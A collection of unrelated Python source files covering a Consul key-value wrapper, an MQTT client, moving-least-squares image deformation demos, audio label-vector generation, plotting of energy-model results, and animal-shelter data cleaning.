consul_host = self.url.netloc or cfg.consul_host
self.meta = Consul_KV.meta_cls(
key=self.url.path.lstrip("/"),
consul=Consul(host=consul_host),
)
def create(self, **data):
log.debug(f"consul-kv: create '{self.meta.key}'")
self.meta.consul.kv.put(self.meta.key, data["value"])
def read(self):
req_index, req_obj = self.meta.consul.kv.get(self.meta.key)
try:
self.data = Consul_KV.data_cls(
value=req_obj["Value"].decode("utf-8"),
)
except Exception as e:
raise ResourceNotFoundError
def update(self, **data):
log.debug(f"consul-kv: update '{self.meta.key}'")
self.meta.consul.kv.put(self.meta.key, data["value"])
def delete(self):
raise NotImplementedError(f"ConsulKV: delete")
|
12,737 | 75ace70625d0652fb163b4239d9182f3e84496dd | import paho.mqtt.client as mqtt
from settings import Settings, historical_settings
import json
import sqlite3
from printer import a_print
from config import Config
class MyMQTTClass(mqtt.Client):
def on_connect(self, mqttc, flags, rc):
if rc==0:
print("connected OK")
else:
print("Bad connection Returned code=",rc)
def on_message(self, mqttc, obj, msg):
# print(msg.topic+" "+str(msg.qos)+" "+str(msg.payload))
# print('Appending to historical_settings')
a_print('Recieved new settings', 'mqtt')
a_print(msg.topic+" "+str(msg.qos)+" "+str(msg.payload), 'mqtt')
received_data = json.loads(msg.payload)
historical_settings.append(Settings(received_data, insert=True))
a_print('Appended to historical_settings', 'mqtt')
def on_publish(self, mqttc, obj, mid):
# print("mid: "+str(mid))
a_print("mid: "+str(mid), 'mqtt')
def on_subscribe(self, mqttc, obj, mid, granted_qos):
# print("Subscribed: "+str(mid)+" "+str(granted_qos))
a_print("Subscribed: "+str(mid)+" "+str(granted_qos), 'mqtt')
def on_log(self, mqttc, obj, level, string):
# print(string)
a_print(string, 'mqtt')
def run(self):
while True:
try:
self.connect(Config.broker)
break
except:
pass
self.subscribe(Config.topic, 1)
self.loop_start()
|
12,738 | 337d84fe3ca5b731386fd9825917d1ebca264863 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Image deformation using moving least squares
@author: Jian-Wei ZHANG
@email: zjw.cs@zju.edu.cn
@date: 2017/8/8
@update: 2020/9/25
@update: 2021/7/14: Simplify usage
@update: 2021/12/24: Fix bugs and add an example of random control points (see `demo2()`)
"""
import time
import numpy as np
import matplotlib.pyplot as plt
try:
import torch # Install PyTorch first: https://pytorch.org/get-started/locally/
from img_utils_pytorch import (
mls_affine_deformation as mls_affine_deformation_pt,
mls_similarity_deformation as mls_similarity_deformation_pt,
mls_rigid_deformation as mls_rigid_deformation_pt,
)
device = torch.device("cuda:0" if torch.cuda.is_available() else 'cpu')
except ImportError as e:
print(e)
from img_utils import (
mls_affine_deformation,
mls_similarity_deformation,
mls_rigid_deformation
)
from PIL import Image
def demo():
p = np.array([
[155, 30], [155, 125], [155, 225],
[235, 100], [235, 160], [295, 85], [293, 180]
])
q = np.array([
[211, 42], [155, 125], [100, 235],
[235, 80], [235, 140], [295, 85], [295, 180]
])
image = np.array(Image.open("images/toy.jpg"))
height, width, _ = image.shape
gridX = np.arange(width, dtype=np.int16)
gridY = np.arange(height, dtype=np.int16)
vy, vx = np.meshgrid(gridX, gridY)
affine = mls_affine_deformation(vy, vx, p, q, alpha=1)
aug1 = np.ones_like(image)
aug1[vx, vy] = image[tuple(affine)]
similar = mls_similarity_deformation(vy, vx, p, q, alpha=1)
aug2 = np.ones_like(image)
aug2[vx, vy] = image[tuple(similar)]
rigid = mls_rigid_deformation(vy, vx, p, q, alpha=1)
aug3 = np.ones_like(image)
aug3[vx, vy] = image[tuple(rigid)]
fig, ax = plt.subplots(1, 4, figsize=(12, 4))
ax[0].imshow(image)
ax[0].set_title("Original Image")
ax[1].imshow(aug1)
ax[1].set_title("Affine Deformation")
ax[2].imshow(aug2)
ax[2].set_title("Similarity Deformation")
ax[3].imshow(aug3)
ax[3].set_title("Rigid Deformation")
for x in ax.flat:
x.axis("off")
plt.tight_layout(w_pad=0.1)
plt.show()
def demo_torch():
p = torch.from_numpy(np.array([
[155, 30], [155, 125], [155, 225],
[235, 100], [235, 160], [295, 85], [293, 180]
])).to(device)
q = torch.from_numpy(np.array([
[211, 42], [155, 125], [100, 235],
[235, 80], [235, 140], [295, 85], [295, 180]
])).to(device)
image = torch.from_numpy(np.array(Image.open("images/toy.jpg"))).to(device)
height, width, _ = image.shape
gridX = torch.arange(width, dtype=torch.int16).to(device)
gridY = torch.arange(height, dtype=torch.int16).to(device)
vy, vx = torch.meshgrid(gridX, gridY)
# !!! Pay attention !!!: the shape of returned tensors are different between numpy.meshgrid and torch.meshgrid
vy, vx = vy.transpose(0, 1), vx.transpose(0, 1)
affine = mls_affine_deformation_pt(vy, vx, p, q, alpha=1)
aug1 = torch.ones_like(image).to(device)
aug1[vx.long(), vy.long()] = image[tuple(affine)]
similar = mls_similarity_deformation_pt(vy, vx, p, q, alpha=1)
aug2 = torch.ones_like(image).to(device)
aug2[vx.long(), vy.long()] = image[tuple(similar)]
rigid = mls_rigid_deformation_pt(vy, vx, p, q, alpha=1)
aug3 = torch.ones_like(image).to(device)
aug3[vx.long(), vy.long()] = image[tuple(rigid)]
fig, ax = plt.subplots(1, 4, figsize=(12, 4))
ax[0].imshow(image)
ax[0].set_title("Original Image")
ax[1].imshow(aug1.cpu().numpy())
ax[1].set_title("Affine Deformation")
ax[2].imshow(aug2.cpu().numpy())
ax[2].set_title("Similarity Deformation")
ax[3].imshow(aug3.cpu().numpy())
ax[3].set_title("Rigid Deformation")
for x in ax.flat:
x.axis("off")
plt.tight_layout(w_pad=0.1)
plt.show()
def demo2():
""" Smiled Monalisa """
np.random.seed(1234)
image = np.array(Image.open("images/monalisa.jpg"))
height, width, _ = image.shape
# Define deformation grid
gridX = np.arange(width, dtype=np.int16)
gridY = np.arange(height, dtype=np.int16)
vy, vx = np.meshgrid(gridX, gridY)
# ================ Control points group 1 (manually specified) ==================
p1 = np.array([[0, 0], [517, 0], [0, 798], [517, 798],
[140, 186], [135, 295], [181, 208], [181, 261], [203, 184], [202, 304], [225, 213],
[225, 243], [244, 211], [244, 253], [254, 195], [281, 232], [252, 285]
])
q1 = np.array([[0, 0], [517, 0], [0, 798], [517, 798],
[140, 186], [135, 295], [181, 208], [181, 261], [203, 184], [202, 304], [225, 213],
[225, 243], [238, 207], [237, 261], [253, 199], [281, 232], [249, 279]
])
rigid1 = mls_rigid_deformation(vy, vx, p1, q1, alpha=1)
aug1 = np.ones_like(image)
aug1[vx, vy] = image[tuple(rigid1)]
# ====================== Control points group 1 (random) =======================
p2 = np.stack((
np.random.randint(0, height, size=13),
np.random.randint(0, width, size=13),
), axis=1)
q2 = p2 + np.random.randint(-20, 20, size=p2.shape)
rigid2 = mls_rigid_deformation_pt(vy, vx, p2, q2, alpha=1)
aug2 = np.ones_like(image)
aug2[vx, vy] = image[tuple(rigid2)]
fig, ax = plt.subplots(1, 3, figsize=(13, 6))
ax[0].imshow(image)
ax[0].set_title("Original Image")
ax[1].imshow(aug1)
ax[1].set_title("Manually specified control points")
ax[2].imshow(aug2)
ax[2].set_title("Random control points")
for x in ax.flat:
x.axis("off")
plt.tight_layout(w_pad=1.0, h_pad=1.0)
plt.show()
def read_tif(frame):
image_pil = Image.open("images/train-volume.tif")
image_pil.seek(frame)
image = np.array(image_pil)
label_pil = Image.open("images/train-labels.tif")
label_pil.seek(frame)
label = np.array(label_pil)
return image, label
def demo3():
image, label = read_tif(1)
image = np.pad(image, ((30, 30), (30, 30)), mode='symmetric')
label = np.pad(label, ((30, 30), (30, 30)), mode='symmetric')
height, width = image.shape
gridX = np.arange(width, dtype=np.int16)
gridY = np.arange(height, dtype=np.int16)
vy, vx = np.meshgrid(gridX, gridY)
def augment(p, q, mode='affine'):
if mode.lower() == 'affine':
transform = mls_affine_deformation(vy, vx, p, q, alpha=1)
elif mode.lower() == 'similar':
transform = mls_similarity_deformation(vy, vx, p, q, alpha=1)
elif mode.lower() == 'rigid':
transform = mls_rigid_deformation(vy, vx, p, q, alpha=1)
else:
raise ValueError
aug_img = np.ones_like(image)
aug_img[vx, vy] = image[tuple(transform)]
aug_lab = np.ones_like(label)
aug_lab[vx, vy] = label[tuple(transform)]
return aug_img, aug_lab
fig, ax = plt.subplots(2, 4, figsize=(12, 6))
ax[0, 0].imshow(image, cmap='gray')
ax[0, 0].set_title("Original Image")
ax[1, 0].imshow(label, cmap='gray')
ax[1, 0].set_title("Original Label")
np.random.seed(1234)
p = np.c_[np.random.randint(0, height, size=32), np.random.randint(0, width, size=32)]
q = p + np.random.randint(-15, 15, size=p.shape)
q[:, 0] = np.clip(q[:, 0], 0, height)
q[:, 1] = np.clip(q[:, 1], 0, width)
p = np.r_[p, np.array([[0, 0], [0, width - 1], [height - 1, 0], [height - 1, width - 1]])] # fix corner points
q = np.r_[q, np.array([[0, 0], [0, width - 1], [height - 1, 0], [height - 1, width - 1]])] # fix corner points
for i, mode in enumerate(['Affine', 'Similar', 'Rigid']):
aug_img, aug_lab = augment(p, q, mode)
ax[0, i + 1].imshow(aug_img, cmap='gray')
ax[0, i + 1].set_title(f"{mode} Deformated Image")
ax[1, i + 1].imshow(aug_lab, cmap='gray')
ax[1, i + 1].set_title(f"{mode} Deformated Label")
for x in ax.flat:
x.axis('off')
plt.tight_layout(w_pad=1.0, h_pad=1.0)
plt.show()
def benchmark_numpy(image, p, q):
height, width = image.shape[:2]
# Define deformation grid
gridX = np.arange(width, dtype=np.int16)
gridY = np.arange(height, dtype=np.int16)
vy, vx = np.meshgrid(gridX, gridY)
rigid = mls_rigid_deformation(vy, vx, p, q, alpha=1)
aug = np.ones_like(image)
aug[vx, vy] = image[tuple(rigid)]
return aug
def benchmark_torch(image, p, q):
height, width = image.shape[:2]
device = image.device
# Define deformation grid
gridX = torch.arange(width, dtype=torch.int16).to(device)
gridY = torch.arange(height, dtype=torch.int16).to(device)
vy, vx = torch.meshgrid(gridX, gridY)
rigid = mls_rigid_deformation_pt(vy, vx, p, q, alpha=1)
aug = torch.ones_like(image).to(device)
aug[vx.long(), vy.long()] = image[rigid[0], rigid[1]]
return aug
def run_benckmark(i):
sizes = [ # (height, width)
(100, 100),
(500, 500),
(500, 500),
(500, 500),
(1000, 1000),
(2000, 2000),
]
num_pts = [16, 16, 32, 64, 64, 64]
times = []
for _ in range(3):
image = np.random.randint(0, 256, sizes[i])
height, width = image.shape[:2]
p = np.stack((
np.random.randint(0, height, size=num_pts[i]),
np.random.randint(0, width, size=num_pts[i]),
), axis=1)
q = p + np.random.randint(-20, 20, size=p.shape)
start = time.time()
_ = benchmark_numpy(image, p, q)
elapse = time.time() - start
times.append(elapse)
print("Time (numpy):", sum(times) / len(times))
times = []
for _ in range(3):
image = torch.randint(0, 256, sizes[i]).to(device)
height, width = image.shape[:2]
p = torch.stack((
torch.randint(0, height, size=(num_pts[i],)),
torch.randint(0, width, size=(num_pts[i],)),
), dim=1).to(device)
q = p + torch.randint(-20, 20, size=p.shape).to(device)
start = time.time()
_ = benchmark_torch(image, p, q)
elapse = time.time() - start
times.append(elapse)
print("Time (torch):", sum(times) / len(times))
if __name__ == "__main__":
demo()
# demo2()
# demo3()
# demo_torch()
# run_benckmark(i=0)
|
12,739 | ad49c2496f76f4e471583393499a1d32fc2927df | # -*- coding: utf-8 -*-
import unittest
from init_spark.spark_demo01 import rdd_key_operation
from common import spark_context as sc
class MyTestCase(unittest.TestCase):
def test_rdd(self):
rdd_key_operation()
sc.stop()
self.assertEqual(True, True)
if __name__ == '__main__':
unittest.main()
|
12,740 | be9309f051c61cf0c0df1337ddbaa43950cd96f0 |
def find_a_seat(n, lst):
try:
return next(i for i,l in enumerate(lst) if l <= (n/(len(lst)))/2)
except:
return -1
|
12,741 | 012fb2203cf2ae92cbeb29462a21f6e01c06eb15 | import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from moviepy.editor import VideoFileClip
from IPython.display import HTML
import helper_calibration as hpcal
import helper_image as hpimg
from line import Line
import pipeline as pp
line_left = Line()
line_right = Line()
def process_image(image):
global line_left
global line_right
img = pp.pipeline(image, line_left, line_right, cal_mtx, cal_dist)
return img
# STEP 1 camera calibration
global cal_mtx, cal_dist
cal_mtx, cal_dist = hpcal.calibrate_camera()
project_output = 'output_images/result_project_video.mp4'
clip1 = VideoFileClip("project_video.mp4")#.subclip(0,2)
project = clip1.fl_image(process_image)
project.write_videofile(project_output, audio=False)
|
12,742 | be570af62d88fc4572dec8a5c046cc19eee5069f | from glob import glob
import os
from scipy.io import loadmat
import pickle
import torch
class LabelVecWriter:
def __init__(
self,
annot_dir_path,
annot_file_fmt,
spect_file_fmt,
labelvec_file_fmt,
windowed_spects_dir_path,
windowed_labelvec_dir_path,
uncut_spects_dir_path,
uncut_labelvec_dir_path,
num_samples_in_window,
num_samples_in_stride,
samp_freq,
labelmap,
no_label_sym,
labelvec_len,
):
self.annot_dir_path = annot_dir_path
self.annot_file_fmt = annot_file_fmt
self.spect_file_fmt = spect_file_fmt
self.labelvec_file_fmt = labelvec_file_fmt
self.windowed_spects_dir_path = windowed_spects_dir_path
self.windowed_labelvec_dir_path = windowed_labelvec_dir_path
self.uncut_labelvec_dir_path = uncut_labelvec_dir_path
self.uncut_spects_dir_path = uncut_spects_dir_path
self.num_samples_in_window = num_samples_in_window
self.num_samples_in_stride = num_samples_in_stride
self.samp_freq = samp_freq
self.labelmap = labelmap
self.no_label_sym = no_label_sym
self.labelvec_len = labelvec_len
self.window_dur = self.num_samples_in_window / self.samp_freq
self.window_stride_dur = self.num_samples_in_stride / self.samp_freq
# LabelvecWriter entry point, main method.
def write(self, annot_files_list=None):
if annot_files_list is None:
# Collect all annotatiton files from provided annotation directory
annot_file_paths = glob(
os.path.join(self.annot_dir_path, "*" + self.annot_file_fmt)
)
else:
annot_file_paths = [self.annot_dir_path + f for f in annot_files_list]
# Use each annotation to generate a labelvector for corresponding
# spectrogram and spectrogram windows
for afp in annot_file_paths:
file_name = afp.split("/")[-1].split(self.annot_file_fmt)[0]
# Load and extract hand-written audio file annotations from
# which labelvectors will be generated
annot_file_name = file_name + self.annot_file_fmt
annot = self.load_annotation(annot_file_name)
# Load duration of uncut spectrogram corresponding to current annotation
spect_file_path = (
self.uncut_spects_dir_path + file_name + self.spect_file_fmt
)
spect_duration = self.load_spect_duration(spect_file_path)
# Complete spect can be batched as individual windows. Need
# to know how many windows so we know how long the labelvec should be.
num_unique_windows = self.load_number_unique_windows(spect_file_path)
uncut_labelvec_len = self.labelvec_len * num_unique_windows
# Generate and write uncut labelvec
uncut_labelvec = self.extract_labelvec(
0, spect_duration, annot, uncut_labelvec_len
)
# Reshape uncut labelvec into batches of window sized labelvecs
batched_labelvec = self.batch_uncut_labelvec(
uncut_labelvec, num_unique_windows
)
# 1D "uncut" tensor and 2D "batched" representation of labelvec to disk
uncut_labelvec_file_name = file_name + self.labelvec_file_fmt
self.spect_labelvec_to_disk(
uncut_labelvec_file_name, uncut_labelvec, batched_labelvec,
)
# Collect spectrogram window files corresponding to the current annotation
spect_window_files = glob(self.windowed_spects_dir_path + file_name + "*")
for wf in spect_window_files:
# load precomputed window time bounds
window_start_time, stop_time = self.load_window_times(wf)
# Generate window specific labelvec
window_labelvec = self.extract_labelvec(
window_start_time, stop_time, annot, self.labelvec_len
)
# Write window labelvec to disk
window_number = int(wf.split(".window")[1].split(".")[0])
window_labelvec_file_name = (
file_name + ".window" + str(window_number) + self.labelvec_file_fmt
)
self.window_labelvec_to_disk(
window_labelvec_file_name, window_labelvec,
)
def extract_labelvec(self, start, stop, annot, labelvec_len):
song_dur = stop - start
# Duration of a single label
labelbin_dur = song_dur / labelvec_len
labelvec = []
# Build labelvector index by index
for i in range(labelvec_len):
# Beginning and end of current labelbin
idx_start = start + (i * labelbin_dur)
idx_stop = min(idx_start + labelbin_dur, stop)
# Where to collect labelbin, annotation overlaps
overlaps = []
# For each entry in the annotation calculate overlap with labelbin
for onset, offset, lab in annot:
overlap_dur = self.calc_overlap_dur(
(onset, offset), (idx_start, idx_stop)
)
if overlap_dur > 0:
overlaps.append((overlap_dur, lab))
# sort overlaps by duration
overlaps.sort(key=lambda x: x[0])
# if there are no overlaps the segment is labeled as silence
if len(overlaps) == 0:
label = self.no_label_sym
# otherwise check if recorded overlap(s) was majority of labelbin dur
else:
max_overlap_dur = overlaps[0][0]
# if not majority segment labeled as silence
if max_overlap_dur < (labelbin_dur / 2):
label = self.no_label_sym
# otherwise segment labeled appropriately
else:
label = overlaps[0][1]
integer_label = self.labelmap[label]
labelvec.append(integer_label)
return torch.tensor(labelvec)
def window_labelvec_to_disk(self, file_name, labelvec):
file_path = self.windowed_labelvec_dir_path + file_name
with open(file_path, "wb") as handle:
pickle.dump(labelvec, handle)
def spect_labelvec_to_disk(self, file_name, labelvec, batched_labelvec):
file_path = self.uncut_labelvec_dir_path + file_name
labelvec_record = {
"complete": labelvec,
"batched": batched_labelvec,
}
with open(file_path, "wb") as handle:
pickle.dump(labelvec_record, handle)
def batch_uncut_labelvec(self, labelvec, number_of_windows):
return labelvec.view(number_of_windows, self.labelvec_len)
def load_window_times(self, file_path):
with open(file_path, "rb") as handle:
window_record = pickle.load(handle)
return window_record["times"]
def load_number_unique_windows(self, file_path):
with open(file_path, "rb") as handle:
spect_record = pickle.load(handle)
batched_windows = list(spect_record["batched_windows"].values())
samp = batched_windows[0]
number_windows = samp.size()[0]
return number_windows
def load_spect_duration(self, file_path):
with open(file_path, "rb") as handle:
spect_record = pickle.load(handle)
return spect_record["duration"]
def load_annotation(self, file_name):
annotations = []
annot_file_path = self.annot_dir_path + file_name
annot = loadmat(annot_file_path)
annots = [annot]
for a in annots:
onsets = a["onsets"].flatten()
offsets = a["offsets"].flatten()
labels = [lab for lab in a["labels"][0]]
annotations.append(list(zip(onsets, offsets, labels)))
if len(annotations) == 1:
return annotations[0]
else:
return annotations
# Calculates overlap duration of two segments (tuples)
def calc_overlap_dur(self, seg1, seg2):
return max(0, min(seg1[1], seg2[1]) - max(seg1[0], seg2[0]))
|
12,743 | f7337323801fea3fbbbdde49bf1b562117e88810 | from .health import HealthResource
from .google_translate import GoogleTranslate_v3 |
12,744 | a2acc3e73f50293b05ae4e85da30d5c4d25073d6 | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\packages\entosis\entosisConst.py
from carbon.common.lib.const import HOUR
EVENT_TYPE_TCU_DEFENSE = 1
EVENT_TYPE_IHUB_DEFENSE = 2
EVENT_TYPE_STATION_DEFENSE = 3
EVENT_TYPE_STATION_FREEPORT = 4
EVENTS_TYPES_WITH_OCCUPANCY_BONUS = (EVENT_TYPE_TCU_DEFENSE, EVENT_TYPE_IHUB_DEFENSE, EVENT_TYPE_STATION_DEFENSE)
EVENT_DEBUG_NAMES_BY_TYPE = {EVENT_TYPE_TCU_DEFENSE: 'TCU Defense',
EVENT_TYPE_IHUB_DEFENSE: 'IHub Defense',
EVENT_TYPE_STATION_DEFENSE: 'Station Defense',
EVENT_TYPE_STATION_FREEPORT: 'Station Freeport'}
EVENT_TYPE_TCU_DEFENSE = 1
EVENT_TYPE_IHUB_DEFENSE = 2
EVENT_TYPE_STATION_DEFENSE = 3
EVENT_TYPE_STATION_FREEPORT = 4
STRUCTURE_SCORE_UPDATED = 0
STRUCTURES_UPDATED = 1
CHANGE_PRIMETIME_DELAY = 48 * HOUR
|
12,745 | ed0f29d05251b88b162bf9a440ace32af4de74de | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 19 22:34:55 2019
@author: bakunobu
"""
import numpy as np
N = int(input('Choose the time gap to calculate ATR: '))
h = []
l = []
close = []
h = h[-N:]
l = l[-N:]
prev_close = close[-N-1:-1]
day_diff = h-l
h_diff = h - prev_close
l_diff = prev_close - l
true_range = np.maximum(day_diff, h_diff, l_diff)
atr = np.zeros(N)
atr[0] = np.mean(true_range)
for i in range(1, N):
atr[i] = ((N-1) * atr[i-1] + true_range[i]) / N
|
12,746 | 96f68a1fa43daae9421fea3a893583730e1e0a63 | import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# Revenue and cost distribution
data11 = pd.read_csv('Results_HPC/Results_Stochastic_yearly_HPC.csv')
data22 = pd.read_csv('Results_HPC/Results_Deterministic_yearly_HPC.csv')
data11 = data11.sort_values('scenario')
data11 = data11.reset_index(drop=True)
data11_1 = data11.loc[0:29]
data11_2 = data11.loc[30:59]
p1 = data22['PPA revenue']
m1 = data22['market revenue']
c1 = (data22['OpexFix'])*(-1)
o1 = (data22['OpexVar'])*(-1)
f1 = (data22['ProdCost'])*(-1)
k1 = (data22['Penalty'])*(-1)
p2 = data11_1['PPA revenue']
m2 = data11_1['market revenue']
c2 = (data11_1['OpexFix'])*(-1)
o2 = (data11_1['OpexVar'])*(-1)
f2 = (data11_1['ProdCost'])*(-1)
k2 = (data11_1['Penalty'])*(-1)
p3 = data11_2['PPA revenue']
m3 = data11_2['market revenue']
c3 = (data11_2['OpexFix'])*(-1)
o3 = (data11_2['OpexVar'])*(-1)
f3 = (data11_2['ProdCost'])*(-1)
k3 = (data11_2['Penalty'])*(-1)
x = ['Deterministic', 'Scenario 1', 'Scenario 2']
y1 = np.array([sum(p1), sum(p2), sum(p3)])
y2 = np.array([sum(m1), sum(m2), sum(m3)])
# plot bars in stack manner
plt.bar(x, y1, color='limegreen')
plt.bar(x, y2, bottom=y1, color='springgreen')
x = ['Deterministic', 'Scenario 1', 'Scenario 2']
y3 = np.array([sum(c1), sum(c2), sum(c3)])
y4 = np.array([sum(o1), sum(o2), sum(o3)])
y5 = np.array([sum(f1), sum(f2), sum(f3)])
y6 = np.array([sum(k1), sum(k2), sum(k3)])
# plot bars in stack manner
plt.bar(x, y3, color='midnightblue')
plt.bar(x, y4, bottom=y3, color='aqua')
plt.bar(x, y5, bottom=y3 + y4, color='dimgrey')
plt.bar(x, y6, bottom=y3 + y4 + y5, color='red')
plt.ylabel("Costs and revenues [€]")
plt.legend(['Revenue from PPA', 'Revenue from market', 'Fixed opex', 'Variable opex', 'Fuel cost', 'Penalty cost'])
plt.show()
# Emissions
x = ['Deterministic', 'Scenario 1', 'Scenario 2']
y1 = np.array([sum(data22['CO2']), sum(data11_1['CO2']), sum(data11_2['CO2'])])
# plot bars in stack manner
plt.bar(x, y1, color='lightslategrey')
plt.ylabel("Tonnes of CO2")
plt.legend(['CO2 emissions'])
plt.show()
# Energy production by source
data1 = pd.read_csv('Results_HPC/Results_Stochastic_scen3_hourly_HPC.csv')
data2 = pd.read_csv('Results_HPC/Results_Deterministic_hourly_HPC.csv')
data1 = data1.sort_values('scenario')
data1 = data1.reset_index(drop=True)
data1_1 = data1.loc[0:262799]
data1_2 = data1.loc[262800:525599]
x = ['Deterministic', 'Scenario 1', 'Scenario 2']
y1 = np.array([sum(data2['solar']), sum(data1_1['solar']), sum(data1_2['solar'])])
y2 = np.array([sum(data2['wind']), sum(data1_1['wind']), sum(data1_2['wind'])])
y3 = np.array([sum(data2['coal']), sum(data1_1['coal']), sum(data1_2['coal'])])
y4 = np.array([sum(data2['battery']), sum(data1_1['battery']), sum(data1_2['battery'])])
# plot bars in stack manner
plt.bar(x, y1, color='orangered')
plt.bar(x, y2, bottom=y1, color='dodgerblue')
plt.bar(x, y3, bottom=y1 + y2, color='darkgrey')
plt.bar(x, y4, bottom=y1 + y2 + y3, color='seagreen')
plt.ylabel("Energy [MWh]")
plt.legend(['Solar', 'Wind', 'Coal', 'Battery'])
plt.show()
|
12,747 | 36bad3528e526eee534071f668279e5ce25291b0 | """empty message
Revision ID: 15c83b7c1422
Revises: 219558c6bdf3
Create Date: 2019-03-18 06:39:54.952596
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '15c83b7c1422'
down_revision = '219558c6bdf3'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('item', sa.Column('kadaluwarsa', sa.String(length=100), nullable=True))
op.add_column('item', sa.Column('terjual', sa.Integer(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('item', 'terjual')
op.drop_column('item', 'kadaluwarsa')
# ### end Alembic commands ###
|
12,748 | 2f7fd01e418edfce285ea3076324b78974b9d0ee | from utils import get, update, increment, decrement
|
12,749 | 6cb6466f77b818365df3a296b3a178b1c644bc0f | '''
4. Представлен список чисел.
Необходимо вывести те его элементы, значения которых больше предыдущего, например:
src = [300, 2, 12, 44, 1, 1, 4, 10, 7, 1, 78, 123, 55]
result = [12, 44, 4, 10, 78, 123]
'''
src = [300, 2, 12, 44, 1, 1, 4, 10, 7, 1, 78, 123, 55]
result = [src[i] for i in range(1, len(src)) if src[i] > src[i-1]]
print(result)
|
12,750 | cad3ebd4611cc70fc517df7eeac009d0af62942b | from setuptools import setup, find_packages
import flake8diff
def read(path):
with open(path, 'rb') as fid:
return fid.read().decode('utf-8')
setup(
name="flake8-diff",
version=flake8diff.__version__,
url="http://dealertrack.github.io",
author="Dealertrack Technologies",
author_email="gregory.armer@dealertrack.com",
description=flake8diff.__description__,
long_description='\n' + read('README.rst'),
download_url=(
'https://github.com/dealertrack/flake8-diff/releases/tag/v'
+ flake8diff.__version__
),
include_package_data=True,
packages=find_packages(),
package_data={'flake8-diff': ['README.rst']},
zip_safe=False,
install_requires=[
'flake8',
'argparse',
'blessings',
'six',
],
entry_points={
'console_scripts': [
'flake8-diff=flake8diff.main:main'
]
},
dependency_links=[]
)
|
12,751 | 8341bc7ba186d4e8b0f54258cebbcaec21bb475e |
frase_usuario = input("Introduce un texto: ")
mayusculas = 0
for letra in frase_usuario:
if letra.isupper():
mayusculas += 1
print("Hay {} mayusculas". format(mayusculas))
|
12,752 | 63561652adb990700b30a14447aa9cb6a2b5a8d8 | '''A program to split the RFID string into csv format: PIT, antenna, date, month, year, hour, minute, second
November 2018
@authors: James Eapen (jpe4)'''
import re
class Timestamp():
def __init__(self, line = ''):
if len(line) == 0:
self.pit = ''
self.antenna = ''
self.month = ''
self.date = ''
self.year = ''
self.hour = ''
self.minute = ''
self.second = ''
else:
self.timestamp = re.split('\W+', line)
self.pit = self.timestamp[0]
self.antenna = self.timestamp[1]
self.month = self.timestamp[2]
self.date = self.timestamp[3]
self.year = self.timestamp[4]
self.hour = self.timestamp[5]
self.minute = self.timestamp[6]
self.second = self.timestamp[7]
def __str__(self):
return str(self.pit + self.antenna + self.month + self.date + self.year + self.hour + self.minute + self.second)
def get_timestamp_csv(self):
return str(','.join(self.timestamp))
if __name__ == '__main__':
empty = Timestamp()
bird = Timestamp('011016DCB7,1,6/13/2016 9:32:35')
print(empty, bird) |
12,753 | 1c9c1a6f0b22d6fef4587a04d7eea1c516dc439b | from __future__ import division
import sys
import numpy as np
import matplotlib.pyplot as plt
from sklearn import preprocessing
from sklearn import svm
import re
dataVectors = []
#the file train.csv is expected
file = open('train.csv','r')
for line in file:
dataVectors.append(line.strip().split(','))
file.close
#find the attribute names
attributes = dataVectors[0]
dataVectors = dataVectors[1:]
data=np.array(np.genfromtxt('train.csv',dtype=('S32','S32','S32','S32','S32','S32','S32',int,'S32','S32'),delimiter=',',names=True))
data.shape
#lets first convert all ages into days
#this code was meant to convert all data into days, we found out that was not going to work
#dateByDaysVec = []
#for i in range(len(dataVectors)):
# if "year" in dataVectors[i][7]:
# num = [int(s) for s in dataVectors[i][7].split() if s.isdigit()]
# dateByDaysVec.append(365*num[0])
# elif "month" in dataVectors[i][7]:
# num = [int(s) for s in dataVectors[i][7].split() if s.isdigit()]
# dateByDaysVec.append(30*num[0])
# elif "week" in dataVectors[i][7]:
# num = [int(s) for s in dataVectors[i][7].split() if s.isdigit()]
# dateByDaysVec.append(7*num[0])
# elif "day" in dataVectors[i][7]:
# num = [int(s) for s in dataVectors[i][7].split() if s.isdigit()]
# dateByDaysVec.append(num[0])
# else:
# dateByDaysVec.append(0)
yearsAlive = []
#assign number based on year
#less than a year 0
#every year after is another int
#convert all age data into yearly ints
for i in range(len(dataVectors)):
if "year" in dataVectors[i][7]:
num = [int(s) for s in dataVectors[i][7].split() if s.isdigit()]
yearsAlive.append(num[0])
data['AgeuponOutcome'][i] = num[0]
else:
yearsAlive.append(0)
data['AgeuponOutcome'][i] = 0
#used to show the age dataskew uncomment to see
#plt.hist(data['AgeuponOutcome'],4)
#plt.show()
#seperate age data into 3 distinct categories
idx_age_0=data['AgeuponOutcome']<5
idx_age_1=(data['AgeuponOutcome']>=5) & (data['AgeuponOutcome']<10)
idx_age_2=data['AgeuponOutcome']>=10
#save new data and reopen data with years now as strings instead of ints
np.savetxt('filterPass1.txt',data,fmt="%s",delimiter=',')
data=np.array(np.genfromtxt('filterPass1.txt',dtype=('S32','S32','S32','S32','S32','S32','S32','S32','S32','S32'),delimiter=',',names=attributes))
dataLen = len(dataVectors)
dataVectors = []
file = open('filterPass1.txt','r')
for line in file:
dataVectors.append(line.strip().split(','))
file.close()
dataLen2 = len(dataVectors)
#save new year data as easy to read strings
data['AgeuponOutcome'][idx_age_0]='<5years'
data['AgeuponOutcome'][idx_age_1]='>=5and<10years'
data['AgeuponOutcome'][idx_age_2]='>=10years'
#so seperating the animals by pairs of 5 years could work
#now we have defined two different ways to look at the amount of time the pets have been alive
#decide later what is more appropriate
#next step is to take the animals with no names and assign them "NoName"
#I will also keep track of unnamed pets vs named
listOfAnimalNames = []
unnamedVsNamed = []
for i in range(len(dataVectors)):
if dataVectors[i][1] != '':
listOfAnimalNames.append(dataVectors[i][1])
unnamedVsNamed.append('Named')
else:
listOfAnimalNames.append('NoName')
unnamedVsNamed.append('NoName')
idx_name_0 = data['Name'] != ''
idx_name_1 = data['Name'] == ''
data['Name'][idx_name_0] = "Named"
data['Name'][idx_name_1] = "NoName"
